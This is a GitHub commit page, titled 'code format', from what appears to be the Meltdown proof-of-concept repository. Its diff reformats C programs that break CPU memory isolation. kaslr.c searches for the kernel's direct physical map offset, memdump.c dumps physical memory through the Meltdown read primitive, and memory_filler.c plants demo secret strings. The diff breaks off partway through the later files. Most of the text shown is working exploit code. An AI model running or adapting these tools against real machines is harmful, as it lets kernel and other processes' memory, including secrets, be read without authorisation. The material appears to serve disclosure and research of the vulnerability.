/meltdown

Permalink
Browse files

code format

1 parent e2a3570 commit 2965178db52908939e413178f31a38c5209e875b @misc0110 misc0110 committed Jan 2, 2018
Unified Split
Showing with 285 additions and 275 deletions.
  1. +52 −51 kaslr.c
  2. +62 −60 memdump.c
  3. +51 −51 memory_filler.c
  4. +39 −33 physical_reader.c
  5. +47 −45 secret.c
  6. +34 −35 test.c
View
103 kaslr.c
@@ -1,58 +1,59 @@
+#include "libkdump.h"
#include <stdio.h>
#include <stdlib.h>
-#include "libkdump.h"
+int main(int argc, char *argv[]) {
+ size_t scratch[4096];
+ libkdump_config_t config;
+ size_t offset = 0xffff880000000000ull;
+ size_t step = 0x1000000000ll;
+ size_t delta = -2 * step;
+ int progress = 0;
-int main(int argc, char* argv[]) {
- size_t scratch[4096];
- libkdump_config_t config;
- size_t offset = 0xffff880000000000ull;
- size_t step = 0x1000000000ll;
- size_t delta = -2 * step;
- int progress = 0;
-
- libkdump_enable_debug(0);
-
- config = libkdump_get_autoconfig();
- config.retries = 10;
- config.measurements = 1;
-
- libkdump_init(config);
-
-
- size_t var = (size_t)(scratch + 2048);
- *(char*)var = 'X';
-
- size_t start = libkdump_virt_to_phys(var);
- if(!start) {
- printf("\x1b[31;1m[!]\x1b[0m Program requires root privileges (or read access to /proc/<pid>/pagemap)!\n");
- exit(1);
- }
-
- while(1) {
- *(volatile char*)var = 'X';
- *(volatile char*)var = 'X';
- *(volatile char*)var = 'X';
- *(volatile char*)var = 'X';
- *(volatile char*)var = 'X';
-
- int res = libkdump_read(start + offset + delta);
- if(res == 'X') {
- printf("\r\x1b[32;1m[+]\x1b[0m Direct physical map offset: \x1b[33;1m0x%zx\x1b[0m\n", offset + delta);
- fflush(stdout);
- break;
- } else {
- delta += step;
- if(delta >= -1ull - offset) {
- delta = 0;
- step >>= 4;
- }
- printf("\r\x1b[34;1m[%c]\x1b[0m 0x%zx ", "/-\\|"[(progress++ / 400) % 4], offset + delta);
- }
+ libkdump_enable_debug(0);
+
+ config = libkdump_get_autoconfig();
+ config.retries = 10;
+ config.measurements = 1;
+
+ libkdump_init(config);
+
+ size_t var = (size_t)(scratch + 2048);
+ *(char *)var = 'X';
+
+ size_t start = libkdump_virt_to_phys(var);
+ if (!start) {
+ printf("\x1b[31;1m[!]\x1b[0m Program requires root privileges (or read "
+ "access to /proc/<pid>/pagemap)!\n");
+ exit(1);
+ }
+
+ while (1) {
+ *(volatile char *)var = 'X';
+ *(volatile char *)var = 'X';
+ *(volatile char *)var = 'X';
+ *(volatile char *)var = 'X';
+ *(volatile char *)var = 'X';
+
+ int res = libkdump_read(start + offset + delta);
+ if (res == 'X') {
+ printf("\r\x1b[32;1m[+]\x1b[0m Direct physical map offset: "
+ "\x1b[33;1m0x%zx\x1b[0m\n",
+ offset + delta);
+ fflush(stdout);
+ break;
+ } else {
+ delta += step;
+ if (delta >= -1ull - offset) {
+ delta = 0;
+ step >>= 4;
+ }
+ printf("\r\x1b[34;1m[%c]\x1b[0m 0x%zx ",
+ "/-\\|"[(progress++ / 400) % 4], offset + delta);
}
+ }
+
+ libkdump_cleanup();
- libkdump_cleanup();
-
- return 0;
+ return 0;
}
-
View
122 memdump.c
@@ -1,70 +1,72 @@
+#include "libkdump.h"
#include <stdio.h>
#include <stdlib.h>
-#include "libkdump.h"
-int main(int argc, char* argv[]) {
- size_t phys = 1ull * 1024ull * 1024ull * 1024ull; // start at first gigabyte
- if(argc >= 2) {
- phys = strtoull(argv[1], NULL, 0);
- }
-
- int width = 16; // characters per line
- int suppress_empty = 1;
-
- libkdump_config_t config;
- config = libkdump_get_autoconfig();
- config.retries = 10;
- config.measurements = 2;
- if(argc >= 3) {
- config.physical_offset = strtoull(argv[2], NULL, 0);
- }
+int main(int argc, char *argv[]) {
+ size_t phys = 1ull * 1024ull * 1024ull * 1024ull; // start at first gigabyte
+ if (argc >= 2) {
+ phys = strtoull(argv[1], NULL, 0);
+ }
+
+ int width = 16; // characters per line
+ int suppress_empty = 1;
+
+ libkdump_config_t config;
+ config = libkdump_get_autoconfig();
+ config.retries = 10;
+ config.measurements = 2;
+ if (argc >= 3) {
+ config.physical_offset = strtoull(argv[2], NULL, 0);
+ }
- libkdump_init(config);
-
- size_t vaddr = libkdump_phys_to_virt(phys);
+ libkdump_init(config);
- printf("\x1b[32;1m[+]\x1b[0m Physical address : \x1b[33;1m0x%zx\x1b[0m\n", phys);
- printf("\x1b[32;1m[+]\x1b[0m Physical offset : \x1b[33;1m0x%zx\x1b[0m\n\n", config.physical_offset);
-
- size_t delta = 0;
- int i;
- char* buffer = malloc(width);
-
- while(1) {
- int value = libkdump_read(vaddr + delta);
- buffer[delta % width] = value;
-
- if(delta % width == width - 1) {
- int skip = 1;
- for(i = 0; i < width; i++) {
- if(buffer[i]) {
- skip = 0;
- break;
- }
- }
- if(skip && suppress_empty) {
- delta++;
- continue;
- }
-
- printf("%10zx: ", delta + phys);
- printf("| ");
- for(i = 0; i < width; i++) {
- printf("%02x ", (unsigned char)buffer[i]);
- }
- printf("| ");
- for(i = 0; i < width; i++) {
- printf("%c", (buffer[i] >= 32 && buffer[i] <= 126) ? buffer[i] : '.');
- }
- printf(" |\n");
-
+ size_t vaddr = libkdump_phys_to_virt(phys);
+
+ printf(
+ "\x1b[32;1m[+]\x1b[0m Physical address : \x1b[33;1m0x%zx\x1b[0m\n",
+ phys);
+ printf("\x1b[32;1m[+]\x1b[0m Physical offset : "
+ "\x1b[33;1m0x%zx\x1b[0m\n\n",
+ config.physical_offset);
+
+ size_t delta = 0;
+ int i;
+ char *buffer = malloc(width);
+
+ while (1) {
+ int value = libkdump_read(vaddr + delta);
+ buffer[delta % width] = value;
+
+ if (delta % width == width - 1) {
+ int skip = 1;
+ for (i = 0; i < width; i++) {
+ if (buffer[i]) {
+ skip = 0;
+ break;
}
+ }
+ if (skip && suppress_empty) {
delta++;
+ continue;
+ }
+
+ printf("%10zx: ", delta + phys);
+ printf("| ");
+ for (i = 0; i < width; i++) {
+ printf("%02x ", (unsigned char)buffer[i]);
+ }
+ printf("| ");
+ for (i = 0; i < width; i++) {
+ printf("%c", (buffer[i] >= 32 && buffer[i] <= 126) ? buffer[i] : '.');
+ }
+ printf(" |\n");
}
+ delta++;
+ }
+
+ free(buffer);
+ libkdump_cleanup();
-
- free(buffer);
- libkdump_cleanup();
-
- return 0;
+ return 0;
}
View
102 memory_filler.c
@@ -2,57 +2,57 @@
#include <stdlib.h>
#include <string.h>
-const char* strings[] = {
- "If you can read this, this is really bad",
- "Burn after reading this string, it is a secret string",
- "Congratulations, you just spied on an application",
- "Wow, you broke the security boundary between user space and kernel",
- "Welcome to the wonderful world of microarchitectural attacks",
- "Please wait while we steal your secrets...",
- "Don't panic... But your CPU is broken and your data is not safe",
- "How can you read this? You should not read this!"
-};
-
-
-int main(int argc, char* argv[]) {
- if(argc != 2) {
- printf("Usage: %s <gigabytes to fill>\n", argv[1]);
- return 0;
- }
-
- size_t size = strtoull(argv[1], NULL, 0);
- if(!size) {
- printf("\x1b[31;1m[!]\x1b[0m Invalid size!\n");
- return 1;
- }
-
- size_t bytesize = size * 1024ull * 1024ull * 1024ull;
- char* memory = malloc(bytesize);
- if(!memory) {
- printf("\x1b[31;1m[!]\x1b[0m Could not allocate %zd GB memory, try less!\n", size);
- return 1;
- }
-
- int lens[sizeof(strings) / sizeof(strings[0])];
- int i;
- for(i = 0; i < sizeof(strings) / sizeof(strings[0]); i++) {
- lens[i] = strlen(strings[i]);
- }
-
- size_t pos = 0;
- while(pos < bytesize) {
- int string_index = rand() % (sizeof(strings) / sizeof(strings[0]));
- if(lens[string_index] + pos < bytesize) {
- memcpy(memory + pos, strings[string_index], lens[string_index]);
- pos += lens[string_index];
- } else {
- break;
- }
+const char *strings[] = {
+ "If you can read this, this is really bad",
+ "Burn after reading this string, it is a secret string",
+ "Congratulations, you just spied on an application",
+ "Wow, you broke the security boundary between user space and kernel",
+ "Welcome to the wonderful world of microarchitectural attacks",
+ "Please wait while we steal your secrets...",
+ "Don't panic... But your CPU is broken and your data is not safe",
+ "How can you read this? You should not read this!"};
+
+int main(int argc, char *argv[]) {
+ if (argc != 2) {
+ printf("Usage: %s <gigabytes to fill>\n", argv[1]);
+ return 0;
+ }
+
+ size_t size = strtoull(argv[1], NULL, 0);
+ if (!size) {
+ printf("\x1b[31;1m[!]\x1b[0m Invalid size!\n");
+ return 1;
+ }
+
+ size_t bytesize = size * 1024ull * 1024ull * 1024ull;
+ char *memory = malloc(bytesize);
+ if (!memory) {
+ printf("\x1b[31;1m[!]\x1b[0m Could not allocate %zd GB memory, try less!\n",
+ size);
+ return 1;
+ }
+
+ int lens[sizeof(strings) / sizeof(strings[0])];
+ int i;
+ for (i = 0; i < sizeof(strings) / sizeof(strings[0]); i++) {
+ lens[i] = strlen(strings[i]);
+ }
+
+ size_t pos = 0;
+ while (pos < bytesize) {
+ int string_index = rand() % (sizeof(strings) / sizeof(strings[0]));
+ if (lens[string_index] + pos < bytesize) {
+ memcpy(memory + pos, strings[string_index], lens[string_index]);
+ pos += lens[string_index];
+ } else {
+ break;
}
-
- printf("\x1b[32;1m[+]\x1b[0m Press any key if you are done reading the secret\n");
- getchar();
- printf("\x1b[32;1m[+]\x1b[0m Done!\n");
+ }
+
+ printf("\x1b[32;1m[+]\x1b[0m Press any key if you are done reading the "
+ "secret\n");
+ getchar();
+ printf("\x1b[32;1m[+]\x1b[0m Done!\n");
- free(memory);
+ free(memory);
}
Oops, something went wrong.

0 comments on commit 2965178

Please sign in to comment.